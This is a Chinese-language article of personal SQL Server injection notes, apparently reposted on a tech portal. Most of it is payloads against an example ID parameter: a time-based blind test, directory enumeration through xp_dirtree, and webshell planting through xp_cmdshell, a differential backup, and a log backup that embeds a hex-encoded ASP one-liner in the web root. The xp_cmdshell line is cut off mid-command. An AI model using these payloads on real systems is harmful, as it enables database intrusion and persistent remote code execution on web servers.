SQL Server注入笔记

安全 数据安全
在一些大公司,通常都是使用mysql+php+apache的居多,对 Microsoft SQL Server 注入实战相对就较少,平时在处理漏洞或者测试时,对于一些有学习价值的注入测试思路、sql语句都会文本备忘下,这里索性就将sql server注入笔记放上来,便于查询。

 

在一些大公司,通常都是使用mysql+php+apache的居多,对Microsoft SQL Server 注入实战相对就较少,平时在处理漏洞或者测试时,对于一些有学习价值的注入测试思路、sql语句都会文本备忘下,这里索性就将sql server注入笔记放上来,便于查询。

在一些盲注中,尤其是没有过多错误回显信息的情况下,若语句执行成功就返回正常,若失败就弹框提示“服务器连接超时”之类的错误提示,连爆表、爆字段的机会都没有。最初,查询db_owner、sysadmin、xp_cmdshell都是有权限的,如下所示:

 

 

但是,每次用sqlmqp的--sql-shell的功能执行insert总是失败。后来直接在浏览器上测试insert语句发现执行失败,可见sqlmap的sql-shell功能对语句是否执行功能的判断还是比较有限的,啥也没返回。

1、判断注入大多是and 1=1之类的语句,也经常被过滤掉,这里备忘下sql server基于时间的注入判断:

test.aspx?ID=300 WAITFOR DELAY '0:0:5'--

2、最初通过xp_regread读取注册表值来获取web路径:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots,但是返回为空,于是就采用下列方法遍历C盘,并将结果写入临时表中(注意:在执行扩展存储功能时,所创建的表段应于扩展存储功能的参数相一致,否则会出错!):

test.aspx?ID=300;CREATE TABLE TMP([ID] int IDENTITY (1,1) NOT NULL,[name] [nvarchar] (300) NOT NULL,[depth] [int] NOT NULL,[isfile] [nvarchar] (50) NULL);insert into tmp exec master..xp_dirtree 'c:/',1,1

用sqlmap把表TMP中的值跑出来:

比如站点主目录位于默认路径C:/inetpub/wwwroot,那么通过以下命令可写入一句话木马,其中的中括号前面需要使用^转义:

test.aspx?ID=300;exec master..xp_cmdshell 'echo ^

test.asp?ID=300;backup database 数据库名 to disk='c:/inetpub/wwwroot/d.asp' WITH DIFFERENTIAL,FORMAT;-- 只备份差异数据到asp文件中

或者通过log备份写入:

test.asp?ID=300;alter database dbname set RECOVER FULL; 设置数据库为完全恢复模式,以允许备份日志

test.asp?ID=300;create table cmd(a image);

test.asp?ID=300;backup log dbname do disk='c:\cmd' with init; 初始化日志

test.asp?ID=300;insert into cmd(a) values(0x3C25657865637574652872657175657374282261222929253E); 插入一句话木马

test.asp?ID=300;backup log dbname to disk='c:/inetpub/wwwroot/d.asp';drop table cmd;-- 备份包含木马的日志,并删除创建表

责任编辑:蓝雨泪 来源: 博客
相关推荐

2020-10-26 07:04:29

SQL注入mysql

2009-04-02 10:26:27

2010-06-30 17:56:06

2010-12-20 16:04:30

2021-04-02 07:46:52

SQL Server数据库知识笔记

2017-08-10 10:23:59

2011-08-11 14:23:57

SQL Server 索引分区

2010-04-13 14:35:17

2011-08-25 14:25:50

SQL Server修改字段属性

2021-03-24 14:50:00

SQLServer数据库字符串

2011-08-22 11:23:41

SQL Server 数据修改

2021-03-19 07:12:23

SQL Server数据库数据库收缩

2011-10-19 10:47:56

2020-12-16 13:22:37

Web安全SQL工具

2010-09-27 11:17:31

2020-09-28 09:30:13

mybatis

2011-08-19 15:29:10

SQL Server 元数组

2009-04-10 15:37:48

SQL Server2镜像实施

2010-07-23 12:55:29

SQL Server

2010-09-14 16:00:16

点赞
收藏

51CTO技术栈公众号